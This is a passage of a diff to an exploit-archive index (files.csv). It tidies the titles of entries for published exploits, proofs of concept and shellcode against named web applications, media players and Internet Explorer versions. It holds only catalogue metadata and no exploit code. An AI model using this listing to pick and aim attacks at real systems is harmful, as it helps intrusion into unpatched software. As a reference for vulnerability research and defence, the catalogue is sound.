2008-01-24 - Multiple Remote File Include Exploit",2009-12-07,"cr4wl3r ",php,webapps,0 10343,platforms/windows/dos/10343.txt,"Kingsoft Internet Security 9 - Denial of Services",2009-11-05,"Francis Provencher",windows,dos,0 10344,platforms/windows/local/10344.rb,"Adobe Illustrator CS4 14.0.0 - eps Universal Buffer Overflow (meta)",2009-12-07,dookie,windows,local,0 -10345,platforms/windows/local/10345.py,"gAlan - (.galan ) Universal Buffer Overflow Exploit",2009-12-07,Dz_attacker,windows,local,0 +10345,platforms/windows/local/10345.py,"gAlan - (.galan) Universal Buffer Overflow Exploit",2009-12-07,Dz_attacker,windows,local,0 10346,platforms/windows/local/10346.rb,"gAlan 0.2.1 - Universal Buffer Overflow Exploit (meta)",2009-12-07,loneferret,windows,local,0 10347,platforms/hardware/webapps/10347.txt,"Barracuda IMFirewall 620 Vulnerability",2009-12-07,Global-Evolution,hardware,webapps,0 10349,platforms/linux/dos/10349.py,"CoreHTTP Web server off-by-one Buffer Overflow Vulnerability",2009-12-02,"Patroklos Argyroudis",linux,dos,80 @@ -9674,7 +9674,7 @@ id,file,description,date,author,platform,type,port 14948,platforms/php/webapps/14948.txt,"festos CMS 2.3b - Multiple Vulnerabilities",2010-09-09,Abysssec,php,webapps,0 10395,platforms/php/webapps/10395.txt,"Miniweb 2.0 Full Path Disclosure",2009-12-12,"Salvatore Fresta",php,webapps,0 10396,platforms/linux/local/10396.pl,"Mozilla Codesighs Memory Corruption PoC",2009-12-12,"Jeremy Brown",linux,local,0 -10398,platforms/php/webapps/10398.txt,"ZeeCareers 2.x - PHP HR Manager Website [ XSS / Auth Bypass ]",2009-12-12,bi0,php,webapps,0 +10398,platforms/php/webapps/10398.txt,"ZeeCareers 2.x - PHP HR Manager Website (XSS / Auth Bypass)",2009-12-12,bi0,php,webapps,0 10400,platforms/php/webapps/10400.txt,"Acc Auto Dealer Script 5.0 - Persistent XSS and SQL Backup",2009-12-13,bi0,php,webapps,0 10401,platforms/php/webapps/10401.txt,"iDesk (download.php cat_id) SQL Injection Vulnerability",2009-12-13,Manas58,php,webapps,0 10403,platforms/php/webapps/10403.txt,"Uploadscript 1.0 - Multiple Vulnerabilities",2009-12-13,Mr.aFiR,php,webapps,0 @@ -9707,8 +9707,8 @@ id,file,description,date,author,platform,type,port 10437,platforms/php/webapps/10437.txt,"Smart PHP Subscriber Multiple Disclosure Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 10438,platforms/php/webapps/10438.txt,"AdManagerPro CSRF Create Administrator Account",2009-12-14,bi0,php,webapps,0 10439,platforms/php/webapps/10439.txt,"Ez Poll Hoster - Multiple XSS and CSRF Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 -10440,platforms/php/webapps/10440.txt,"Easy Banner Pro - [ CSRF ] Create Administrator Account",2009-12-14,bi0,php,webapps,0 -10442,platforms/php/webapps/10442.txt,"Text Exchange Pro - [ CSRF ] Create Administrator Account",2009-12-14,bi0,php,webapps,0 +10440,platforms/php/webapps/10440.txt,"Easy Banner Pro - CSRF Create Administrator Account",2009-12-14,bi0,php,webapps,0 +10442,platforms/php/webapps/10442.txt,"Text Exchange Pro - CSRF Create Administrator Account",2009-12-14,bi0,php,webapps,0 10444,platforms/php/webapps/10444.txt,"mini Hosting Panel - CSRF Change Admin Settings",2009-12-14,"Milos Zivanovic ",php,webapps,0 10445,platforms/php/webapps/10445.txt,"Tender System 0.9.5b - LFI",2009-12-14,Packetdeath,php,webapps,0 10446,platforms/php/webapps/10446.txt,"WSCreator 1.1 - Blind SQL Injection",2009-12-14,"Salvatore Fresta",php,webapps,0 @@ -9727,7 +9727,7 @@ id,file,description,date,author,platform,type,port 10461,platforms/php/webapps/10461.txt,"Ez Cart 1.0 - Multiple CSRF Vulnerabilities",2009-12-15,"Milos Zivanovic ",php,webapps,0 10462,platforms/php/webapps/10462.txt,"DubSite CMS 1.0 - CSRF Vulnerability",2009-12-15,Connection,php,webapps,0 10463,platforms/php/webapps/10463.txt,"iGaming CMS 1.5 - CSRF Vulnerability",2009-12-15,Nex,php,webapps,0 -10464,platforms/asp/webapps/10464.txt,"GalleryPal FE 1.5- Auth Bypass",2009-12-15,R3d-D3V!L,asp,webapps,0 +10464,platforms/asp/webapps/10464.txt,"GalleryPal FE 1.5 - Auth Bypass",2009-12-15,R3d-D3V!L,asp,webapps,0 10465,platforms/asp/webapps/10465.txt,"SitePal 1.1 - (Auth Bypass) SQL Injection Vulnerability",2009-12-15,R3d-D3V!L,asp,webapps,0 10467,platforms/php/webapps/10467.txt,"family connections <= 2.1.3 - Multiple Vulnerabilities",2009-12-16,"Salvatore Fresta",php,webapps,0 10469,platforms/linux/dos/10469.py,"Monkey HTTP Daemon < 0.9.3 - Denial of Service Vulnerability",2009-12-16,"Patroklos Argyroudis",linux,dos,80 @@ -9766,7 +9766,7 @@ id,file,description,date,author,platform,type,port 10507,platforms/asp/webapps/10507.txt,"Charon Cart 3.0 - (ContentID) Blind SQL Injection Vulnerability",2009-12-17,R3d-D3V!L,asp,webapps,0 10510,platforms/hardware/remote/10510.txt,"Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote,0 10511,platforms/php/webapps/10511.txt,"PHP F1 Upload Shell Upload Vulnerability",2009-12-17,"wlhaan hacker",php,webapps,0 -10512,platforms/php/webapps/10512.txt,"Horde 3.3.5 - ""PHP_SELF"" XSS Vulnerability",2009-12-17,"Juan Galiana Lara",php,webapps,0 +10512,platforms/php/webapps/10512.txt,"Horde 3.3.5 - _PHP_SELF_ XSS Vulnerability",2009-12-17,"Juan Galiana Lara",php,webapps,0 10513,platforms/windows/webapps/10513.txt,"Sitecore Staging Module 5.4.0 - Authentication bypass and File Manipulation",2009-12-17,"L. Weichselbaum",windows,webapps,0 10514,platforms/windows/webapps/10514.txt,"dblog (dblog.mdb) Remote Database Disclosure Vulnerability",2009-12-17,"AnTi SeCuRe",windows,webapps,0 10515,platforms/php/webapps/10515.txt,"Basic PHP Events Lister 2 Add Admin Exploit",2009-12-17,RENO,php,webapps,0 @@ -10084,12 +10084,12 @@ id,file,description,date,author,platform,type,port 10910,platforms/php/webapps/10910.txt,"HLstatsX Community Edition 1.6.5 - Cross-Site Scripting Vulnerability",2010-01-02,Sora,php,webapps,0 10911,platforms/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 (0day)",2010-01-02,Lincoln,windows,remote,0 10912,platforms/php/webapps/10912.txt,"Proxyroll.com Clone PHP Script Cookie Handling Vulnerability",2010-01-02,DigitALL,php,webapps,0 -10920,platforms/windows/dos/10920.cpp,"VirtualDJ Trial 6.0.6 - ""New Year Edition"" - (.m3u) Exploit (0day)",2010-01-02,"fl0 fl0w",windows,dos,0 +10920,platforms/windows/dos/10920.cpp,"VirtualDJ Trial 6.0.6 - _New Year Edition_ - (.m3u) Exploit (0day)",2010-01-02,"fl0 fl0w",windows,dos,0 10921,platforms/php/webapps/10921.txt,"eazyPortal 1.0.0 - Multiple Vulnerabilities",2010-01-02,"Milos Zivanovic ",php,webapps,0 10923,platforms/php/webapps/10923.txt,"superlink script <= 1.0 - (id) SQL Injection Vulnerability",2010-01-02,Red-D3v1L,php,webapps,0 10924,platforms/php/webapps/10924.txt,"AL-Athkat.2.0 - Cross-Site Scripting Vulnerability",2010-01-02,indoushka,php,webapps,0 10928,platforms/php/webapps/10928.txt,"Joomla Component com_dailymeals LFI Vulnerability",2010-01-02,FL0RiX,php,webapps,0 -10929,platforms/php/webapps/10929.txt,"Wordpress Events Plugin SQL Injection Vulnerability",2010-01-02,Red-D3v1L,php,webapps,0 +10929,platforms/php/webapps/10929.txt,"Wordpress Events Plugin - SQL Injection Vulnerability",2010-01-02,Red-D3v1L,php,webapps,0 10930,platforms/php/webapps/10930.txt,"Left 4 Dead Stats 1.1 - SQL Injection Vulnerability",2010-01-02,Sora,php,webapps,0 10931,platforms/php/webapps/10931.txt,"X7CHAT 1.3.6b - Add Admin Exploit",2010-01-02,d4rk-h4ck3r,php,webapps,0 10936,platforms/windows/local/10936.c,"PlayMeNow Malformed M3U Playlist BoF WinXP SP2 Fr",2010-01-03,bibi-info,windows,local,0 @@ -10222,7 +10222,7 @@ id,file,description,date,author,platform,type,port 11130,platforms/windows/dos/11130.pl,"Ofilter Player (skin.ini) Local Crash PoC",2010-01-13,"Rehan Ahmed",windows,dos,0 11131,platforms/windows/dos/11131.pl,"TurboFTP Server 1.00.712 - Remote DoS",2010-01-13,corelanc0d3r,windows,dos,0 11132,platforms/windows/dos/11132.pl,"Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability",2010-01-13,"Rehan Ahmed",windows,dos,0 -11133,platforms/windows/dos/11133.pl,"NPlayer - (.dat Skin ) Local Heap Overflow PoC",2010-01-13,"Rehan Ahmed",windows,dos,0 +11133,platforms/windows/dos/11133.pl,"NPlayer - (.dat Skin) Local Heap Overflow PoC",2010-01-13,"Rehan Ahmed",windows,dos,0 11134,platforms/asp/webapps/11134.txt,"Asp VevoCart Control System 3.0.4 - DB Download Vulnerability",2010-01-13,indoushka,asp,webapps,0 11135,platforms/php/webapps/11135.txt,"PSI CMS 0.3.1 - SQL Injection",2010-01-13,"learn3r hacker",php,webapps,0 11136,platforms/php/webapps/11136.txt,"Public Media Manager SQLi vulns",2010-01-13,"learn3r hacker",php,webapps,0 @@ -10237,7 +10237,7 @@ id,file,description,date,author,platform,type,port 11148,platforms/php/webapps/11148.txt,"PonVFTP Bypass and Shell Upload Vulnerability",2010-01-15,S2K9,php,webapps,0 11149,platforms/windows/dos/11149.c,"Sub Station Alpha 4.08 - (.rt) Local Buffer Overflow PoC",2010-01-15,"fl0 fl0w",windows,dos,0 11150,platforms/windows/dos/11150.txt,"Aqua Real 1.0 & 2.0 - Local Crash PoC",2010-01-15,R3d-D3V!L,windows,dos,0 -11151,platforms/windows/remote/11151.html,"Internet Explorer - wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0 +11151,platforms/windows/remote/11151.html,"Microsoft Internet Explorer - wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0 11152,platforms/windows/local/11152.py,"Google SketchUp <= 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0 11154,platforms/windows/local/11154.py,"BS.Player 2.51 - Universal SEH Overflow Exploit",2010-01-16,Dz_attacker,windows,local,0 11155,platforms/php/webapps/11155.txt,"Transload Script Upload Vulnerability",2010-01-16,DigitALL,php,webapps,0 @@ -10251,7 +10251,7 @@ id,file,description,date,author,platform,type,port 11164,platforms/php/webapps/11164.txt,"Ebay Clone from clone2009 SQL Injection Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",php,webapps,0 11165,platforms/windows/dos/11165.pl,"MediaMonkey Player Local Denial of Service (DoS)",2010-01-17,Red-D3v1L,windows,dos,0 11166,platforms/php/webapps/11166.txt,"Uploader by CeleronDude 5.3.0 - Upload Vulnerability",2010-01-17,Stink',php,webapps,0 -11167,platforms/windows/remote/11167.py,"Internet Explorer Aurora Exploit",2010-01-17,"Ahmed Obied",windows,remote,0 +11167,platforms/windows/remote/11167.py,"Microsoft Internet Explorer 6 - Aurora Exploit",2010-01-17,"Ahmed Obied",windows,remote,0 11168,platforms/php/webapps/11168.txt,"Joomla Component com_pc LFI Vulnerability",2010-01-17,Pyske,php,webapps,0 11169,platforms/php/webapps/11169.txt,"Max's Image Uploader Shell Upload Vulnerability",2010-01-17,indoushka,php,webapps,0 11171,platforms/windows/local/11171.pl,"Audiotran 1.4.1 - Direct RET BoF",2010-01-17,jacky,windows,local,0 @@ -10263,7 +10263,7 @@ id,file,description,date,author,platform,type,port 11178,platforms/php/webapps/11178.txt,"Joomla Component com_libros SQL Injection Vulnerability",2010-01-17,FL0RiX,php,webapps,0 11179,platforms/windows/remote/11179.rb,"Exploit EFS Software Easy Chat Server 2.2 - BoF",2010-01-18,"John Babio",windows,remote,0 11180,platforms/windows/dos/11180.pl,"Muziic Player 2.0 - (.mp3) Local Denial of Service (DoS)",2010-01-18,Red-D3v1L,windows,dos,0 -11182,platforms/windows/dos/11182.txt,"Internet Explorer 6/7/8 - DoS Vulnerability (Shockwave Flash Object)",2010-01-18,"Mert SARICA",windows,dos,0 +11182,platforms/windows/dos/11182.txt,"Microsoft Internet Explorer 6/7/8 - DoS Vulnerability (Shockwave Flash Object)",2010-01-18,"Mert SARICA",windows,dos,0 11183,platforms/php/webapps/11183.txt,"Testlink TestManagement and Execution System 1.8.5 - Multiple Directory Traversal Vulnerabilites",2010-01-18,"Prashant Khandelwal",php,webapps,0 11184,platforms/multiple/webapps/11184.txt,"FreePBX 2.5.x - 2.6.0 - Permanent Cross-Site Scripting (XSS)",2010-01-18,"Ivan Huertas",multiple,webapps,0 11185,platforms/php/webapps/11185.html,"al3jeb script Remote Change Password Exploit",2010-01-18,alnjm33,php,webapps,0 @@ -10303,7 +10303,7 @@ id,file,description,date,author,platform,type,port 11226,platforms/php/webapps/11226.txt,"Joomla Component com_biographies SQL Injection Vulnerability",2010-01-22,snakespc,php,webapps,0 11227,platforms/windows/dos/11227.pl,"yPlay 1.0.76 - (.mp3) Local Crash PoC",2010-01-22,"cr4wl3r ",windows,dos,0 11228,platforms/windows/dos/11228.pl,"Pico MP3 Player 1.0 - (.mp3 /.pls) Local Crash PoC",2010-01-22,"cr4wl3r ",windows,dos,0 -11229,platforms/windows/local/11229.txt,"Internet Explorer wshom.ocx (Run) ActiveX Remote Code Execution (add admin user)",2010-01-22,Stack,windows,local,0 +11229,platforms/windows/local/11229.txt,"Microsoft Internet Explorer - wshom.ocx (Run) ActiveX Remote Code Execution (Add Admin User)",2010-01-22,Stack,windows,local,0 11232,platforms/windows/local/11232.c,"Authentium SafeCentral <= 2.6 shdrv.sys Local kernel ring0 SYSTEM Exploit",2010-01-22,mu-b,windows,local,0 11233,platforms/windows/dos/11233.pl,"QtWeb 3.0 - Remote DoS/Crash Exploit",2010-01-22,"Zer0 Thunder",windows,dos,0 11234,platforms/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash PoC",2010-01-23,b0telh0,windows,dos,0 @@ -10385,7 +10385,7 @@ id,file,description,date,author,platform,type,port 11327,platforms/php/webapps/11327.txt,"myBusinessAdmin (content.php) Blind SQL Injection Vulnerability",2010-02-03,"AtT4CKxT3rR0r1ST ",php,webapps,0 11328,platforms/windows/remote/11328.py,"UplusFtp Server 1.7.0.12 - Remote Buffer Overflow",2010-02-04,b0telh0,windows,remote,0 11329,platforms/php/webapps/11329.txt,"MASA2EL Music City 1.0 - Remote SQL Injection Vulnerability",2010-02-04,alnjm33,php,webapps,0 -11330,platforms/windows/webapps/11330.txt,"ManageEngine OpUtils 5 - ""Login.DO"" SQL Injection Vulnerability",2010-02-04,"Asheesh Anaconda",windows,webapps,0 +11330,platforms/windows/webapps/11330.txt,"ManageEngine OpUtils 5 - _Login.DO_ SQL Injection Vulnerability",2010-02-04,"Asheesh Anaconda",windows,webapps,0 11331,platforms/windows/local/11331.txt,"Ipswitch IMAIL 11.01 reversible encryption + weak ACL",2010-02-04,sinn3r,windows,local,0 11332,platforms/windows/dos/11332.pl,"Opera 10.10 - Remote Code Execution DoS Exploit",2010-02-05,"cr4wl3r ",windows,dos,0 11333,platforms/windows/local/11333.pl,"FoxPlayer 1.7.0 - (.m3u) Local Buffer Overflow Exploit",2010-02-05,"cr4wl3r ",windows,local,0 @@ -10436,7 +10436,7 @@ id,file,description,date,author,platform,type,port 11384,platforms/windows/local/11384.py,"WM Downloader 3.0.0.9 - PLS PLA Exploit (WinXP SP3)",2010-02-10,"Beenu Arora",windows,local,0 11385,platforms/php/webapps/11385.txt,"ULoki Community Forum 2.1 - (usercp.php) XSS Vulnerability",2010-02-10,"Sioma Labs",php,webapps,0 11391,platforms/windows/dos/11391.py,"Open and Compact FTPd 1.2 - Pre-Authentication Crash (PoC)",2010-02-10,loneferret,windows,dos,0 -11392,platforms/windows/dos/11392.c,"Radasm 2.2.1.6 - (.rap ) Local Buffer Overflow PoC",2010-02-11,"fl0 fl0w",windows,dos,0 +11392,platforms/windows/dos/11392.c,"Radasm 2.2.1.6 - (.rap) Local Buffer Overflow PoC",2010-02-11,"fl0 fl0w",windows,dos,0 11393,platforms/jsp/webapps/11393.txt,"Omnidocs SQL Injection Vulnerability",2010-02-11,thebluegenius,jsp,webapps,0 11394,platforms/php/webapps/11394.txt,"vBulletin 3.5.2 - XSS Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0 11395,platforms/php/webapps/11395.txt,"vBulletin 3.0.0 - XSS Vulnerability",2010-02-11,ROOT_EGY,php,webapps,0 @@ -10474,7 +10474,7 @@ id,file,description,date,author,platform,type,port 11434,platforms/php/webapps/11434.txt,"statcountex 3.1 - Multiple Vulnerabilities",2010-02-13,Phenom,php,webapps,0 11436,platforms/php/webapps/11436.txt,"WSN Guest 1.02 (orderlinks) SQL Injection Vulnerability",2010-02-13,Gamoscu,php,webapps,0 11437,platforms/php/webapps/11437.txt,"ZeusCMS 0.2 - (DBD/LFI) Multiple Vulnerabilities",2010-02-13,"ViRuSMaN ",php,webapps,0 -11438,platforms/windows/dos/11438.txt,"Internet Explorer 8 (Multitudinous looping) Denial of Service Exploit",2010-02-13,"Asheesh kumar Mani Tripathi",windows,dos,0 +11438,platforms/windows/dos/11438.txt,"Microsoft Internet Explorer 8 - (Multitudinous looping) Denial of Service Exploit",2010-02-13,"Asheesh kumar Mani Tripathi",windows,dos,0 11440,platforms/php/webapps/11440.txt,"InterTech Co 1.0 - SQL Injection",2010-02-13,Red-D3v1L,php,webapps,0 11441,platforms/php/webapps/11441.txt,"WordPress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0 11442,platforms/php/webapps/11442.txt,"PEAR 1.9.0 - Multiple Remote File Inclusion Vulnerability",2010-02-14,eidelweiss,php,webapps,0 @@ -10490,7 +10490,7 @@ id,file,description,date,author,platform,type,port 11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0 11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0 11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) SQL Injection Vulnerability",2010-02-15,10n1z3d,php,webapps,0 -11457,platforms/windows/remote/11457.pl,"Internet Explorer (6/7) Remote Code Execution -Remote User Add Exploit",2010-02-15,"Sioma Labs",windows,remote,0 +11457,platforms/windows/remote/11457.pl,"Microsoft Internet Explorer 6/7 - Remote Code Execution (Remote User Add Exploit)",2010-02-15,"Sioma Labs",windows,remote,0 11458,platforms/php/webapps/11458.txt,"WordPress Copperleaf Photolog 0.16 - SQL injection",2010-02-15,kaMtiEz,php,webapps,0 11460,platforms/php/webapps/11460.txt,"Dodo Upload 1.3 - Upload Shell (Bypass) Vulnerability",2010-02-15,indoushka,php,webapps,0 11461,platforms/php/webapps/11461.txt,"CoffieNet CMS - Bypass Admin Vulnerability",2010-02-15,indoushka,php,webapps,0 @@ -10627,7 +10627,7 @@ id,file,description,date,author,platform,type,port 11612,platforms/php/webapps/11612.txt,"osCSS 1.2.1 - Database Backups Disclosure",2010-03-02,indoushka,php,webapps,0 11613,platforms/php/webapps/11613.txt,"PHP Advanced Transfer Manager 1.10 - Shell Upload Vulnerability",2010-03-02,indoushka,php,webapps,0 11614,platforms/php/webapps/11614.txt,"Uploadify Sample Collection Shell Upload Vulnerability",2010-03-02,indoushka,php,webapps,0 -11615,platforms/win32/remote/11615.txt,"Internet Explorer - 'winhlp32.exe' 'MsgBox()' Remote Code Execution Vulnerability",2010-03-02,"Maurycy Prodeus ",win32,remote,0 +11615,platforms/win32/remote/11615.txt,"Microsoft Internet Explorer 6 / 7 / 8 - 'winhlp32.exe' 'MsgBox()' Remote Code Execution Vulnerability",2010-03-02,"Maurycy Prodeus ",win32,remote,0 11616,platforms/php/webapps/11616.txt,"My Little Forum contact.php SQL Injection",2010-03-02,"Easy Laster",php,webapps,0 11617,platforms/windows/dos/11617.txt,"Opera + Mozilla Firefox 3.6 - Long String Crash Exploit (0day)",2010-03-02,"Asheesh kumar Mani Tripathi",windows,dos,0 11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow Exploit",2010-03-02,"S2 Crew",windows,remote,0 @@ -10659,7 +10659,7 @@ id,file,description,date,author,platform,type,port 11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0 11651,platforms/multiple/local/11651.txt,"Tod Miller Sudo 1.6.x < 1.6.9p21 & 1.7.x < 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0 -11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus ""V4.rgo"" (id) news.php - SQL Injection Vulnerability",2010-03-08,"Easy Laster",php,webapps,0 +11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus _V4.rgo_ (id) news.php - SQL Injection Vulnerability",2010-03-08,"Easy Laster",php,webapps,0 11655,platforms/php/webapps/11655.txt,"TRIBISUR <= 2.0 - Local File Include Vulnerability",2010-03-08,"cr4wl3r ",php,webapps,0 11656,platforms/windows/local/11656.py,"QuickZip 4.x - (.zip) Local Universal Buffer Overflow PoC Exploit (0day)",2010-03-08,"corelanc0d3r and mr_me",windows,local,0 11657,platforms/php/webapps/11657.txt,"Chaton <= 1.5.2 - Local File Include Vulnerability",2010-03-08,"cr4wl3r ",php,webapps,0 @@ -10702,14 +10702,14 @@ id,file,description,date,author,platform,type,port 11702,platforms/php/webapps/11702.pl,"Invision Power Board Currency Mod 1.3 - (edit) SQL injection",2010-03-12,"Yakir Wizman",php,webapps,0 11704,platforms/php/webapps/11704.txt,"dreamlive auktionshaus script news.php - (id) SQL Injection Vulnerability",2010-03-12,"Easy Laster",php,webapps,0 11705,platforms/multiple/dos/11705.c,"FreeBSD and OpenBSD 'ftpd' NULL Pointer Dereference Denial of Service Vulnerability",2010-03-12,kingcope,multiple,dos,0 -11706,platforms/windows/dos/11706.py,"Media Player classic StatsReader - (.stats ) Stack Buffer Overflow PoC",2010-03-12,ITSecTeam,windows,dos,0 +11706,platforms/windows/dos/11706.py,"Media Player classic StatsReader - (.stats) Stack Buffer Overflow PoC",2010-03-12,ITSecTeam,windows,dos,0 11707,platforms/php/webapps/11707.txt,"Joomla Component com_juliaportfolio Local File Inclusion",2010-03-12,"DevilZ TM",php,webapps,80 11708,platforms/php/webapps/11708.txt,"Joomla Component com_sbsfile Local File Inclusion",2010-03-13,"DevilZ TM",php,webapps,0 11709,platforms/php/webapps/11709.txt,"Joomla Component com_comp SQL Injection Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0 11710,platforms/php/webapps/11710.php,"Joomla Component com_races Blind SQL Injection Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0 11711,platforms/php/webapps/11711.txt,"Azeno CMS - SQL Injection Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0 11713,platforms/windows/local/11713.pl,"Yahoo Player 1.0 - (.m3u) Buffer Overflow Exploit",2010-03-13,Bombard,windows,local,0 -11714,platforms/windows/dos/11714.py,"Mackeitone Media Player - (.m3u ) Stack Buffer Overflow",2010-03-13,ITSecTeam,windows,dos,0 +11714,platforms/windows/dos/11714.py,"Mackeitone Media Player - (.m3u) Stack Buffer Overflow",2010-03-13,ITSecTeam,windows,dos,0 11715,platforms/php/webapps/11715.txt,"systemsoftware Community Black index.php SQL Injection",2010-03-13,"Easy Laster",php,webapps,0 11717,platforms/multiple/dos/11717.php,"Multiple PHP Functions - Local Denial of Service Vulnerabilities",2010-03-13,"Yakir Wizman",multiple,dos,0 11718,platforms/php/webapps/11718.txt,"Xbtit 2.0.0 - SQL Injection Vulnerability",2010-03-13,Ctacok,php,webapps,0 @@ -10721,7 +10721,7 @@ id,file,description,date,author,platform,type,port 11724,platforms/windows/dos/11724.pl,"GOM Player 2.1.21 - (.avi) DoS",2010-03-14,En|gma7,windows,dos,0 11725,platforms/php/webapps/11725.txt,"Joomla Component com_org SQL Injection Vulnerability",2010-03-14,N2n-Hacker,php,webapps,0 11726,platforms/php/webapps/11726.txt,"PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection Vulnerability",2010-03-14,Inj3ct0r,php,webapps,0 -14113,platforms/linux/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(""/bin/sh""_""/bin/sh""_0) (38 bytes)",2010-06-29,"Jonathan Salwan",linux,shellcode,0 +14113,platforms/linux/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) (38 bytes)",2010-06-29,"Jonathan Salwan",linux,shellcode,0 11727,platforms/php/webapps/11727.txt,"Front Door 0.4b - SQL Injection Vulnerability",2010-03-14,blake,php,webapps,0 11728,platforms/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - DoS/Crash (.avi)",2010-03-14,En|gma7,windows,dos,0 11729,platforms/php/webapps/11729.txt,"DesktopOnNet 3 Beta9 - Local File Include Vulnerability",2010-03-14,"cr4wl3r ",php,webapps,0 @@ -10870,13 +10870,13 @@ id,file,description,date,author,platform,type,port 11886,platforms/windows/remote/11886.py,"SAP MaxDB Malformed Handshake Request Remote Code Execution",2010-03-26,"S2 Crew",windows,remote,0 11888,platforms/php/webapps/11888.txt,"DaFun Spirit 2.2.5 - Multiple Remote File Include Vulnerability",2010-03-26,2010-03-26,php,webapps,0 11889,platforms/php/webapps/11889.txt,"leaftec CMS - Multiple vulnerabilities",2010-03-26,Valentin,php,webapps,0 -11890,platforms/ios/dos/11890.txt,"iOS Safari - Bad ""VML"" Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0 +11890,platforms/ios/dos/11890.txt,"iOS Safari - Bad _VML_ Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0 11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0 11892,platforms/php/webapps/11892.txt,"post Card (catid) Remote SQL Injection Vulnerability",2010-03-26,"Hussin X",php,webapps,0 11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 DoS",2010-03-26,OrderZero,linux,dos,0 11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability",2010-03-26,eidelweiss,php,webapps,0 11895,platforms/php/webapps/11895.txt,"CyberCMS Remote SQL Injection Vuln.",2010-03-26,hc0de,php,webapps,0 -11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - [ CSRF ] Create Administrator Account",2010-03-26,bi0,php,webapps,0 +11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - CSRF Create Administrator Account",2010-03-26,bi0,php,webapps,0 11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite (Module Jokes) SQL-Injection Exploit",2010-03-26,Sc0rpi0n,php,webapps,0 11898,platforms/php/webapps/11898.py,"Date & Sex Vor und Rückwärts Auktions System <= 2 - Blind SQL Injection Exploit",2010-03-27,"Easy Laster",php,webapps,0 11899,platforms/php/webapps/11899.html,"AdaptCMS_Lite_1.5 2009-07-07",2010-03-27,ITSecTeam,php,webapps,0 @@ -11009,7 +11009,7 @@ id,file,description,date,author,platform,type,port 12051,platforms/windows/local/12051.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow Exploit (0Day)",2010-04-04,"Yakir Wizman",windows,local,0 12052,platforms/php/webapps/12052.txt,"SAGU-PRO 1.0 - Multiple Remote File Include Vulnerability",2010-04-04,mat,php,webapps,0 12053,platforms/windows/local/12053.py,"ZipCentral (.zip) SEH Exploit",2010-04-04,TecR0c,windows,local,0 -12054,platforms/php/webapps/12054.txt,"Joomla Component redSHOP Local File Inclusion Vulnerability♦",2010-04-04,NoGe,php,webapps,0 +12054,platforms/php/webapps/12054.txt,"Joomla Component redSHOP - Local File Inclusion Vulnerability",2010-04-04,NoGe,php,webapps,0 12055,platforms/php/webapps/12055.txt,"Joomla Component redTWITTER Local File Inclusion Vulnerability",2010-04-04,NoGe,php,webapps,0 12056,platforms/php/webapps/12056.txt,"Joomla Component WISro Yahoo Quotes Local File Inclusion Vulnerability",2010-04-04,NoGe,php,webapps,0 12057,platforms/php/webapps/12057.txt,"Joomla Component com_press SQL Injection Vulnerability",2010-04-04,"DevilZ TM",php,webapps,0 @@ -11101,7 +11101,7 @@ id,file,description,date,author,platform,type,port 12151,platforms/php/webapps/12151.txt,"Joomla Component TRAVELbook Local File Inclusion Vulnerability",2010-04-11,AntiSecurity,php,webapps,0 12152,platforms/windows/remote/12152.pl,"Trellian FTP Client PASV BoF Exploit",2010-04-11,zombiefx,windows,remote,0 12153,platforms/php/webapps/12153.txt,"joomla component education SQL Injection Vulnerability",2010-04-11,bumble_be,php,webapps,0 -12154,platforms/php/dos/12154.txt,"vBulletin ""Cyb - Advanced Forum Statistics"" DoS",2010-04-10,"Andhra Hackers",php,dos,0 +12154,platforms/php/dos/12154.txt,"vBulletin _Cyb - Advanced Forum Statistics_ DoS",2010-04-10,"Andhra Hackers",php,dos,0 12155,platforms/php/webapps/12155.txt,"AuroraGPT 4.0 - RCE Vulnerability",2010-04-11,"Amoo Arash",php,webapps,0 12156,platforms/windows/remote/12156.txt,"IE/Opera source code viewer Null Character 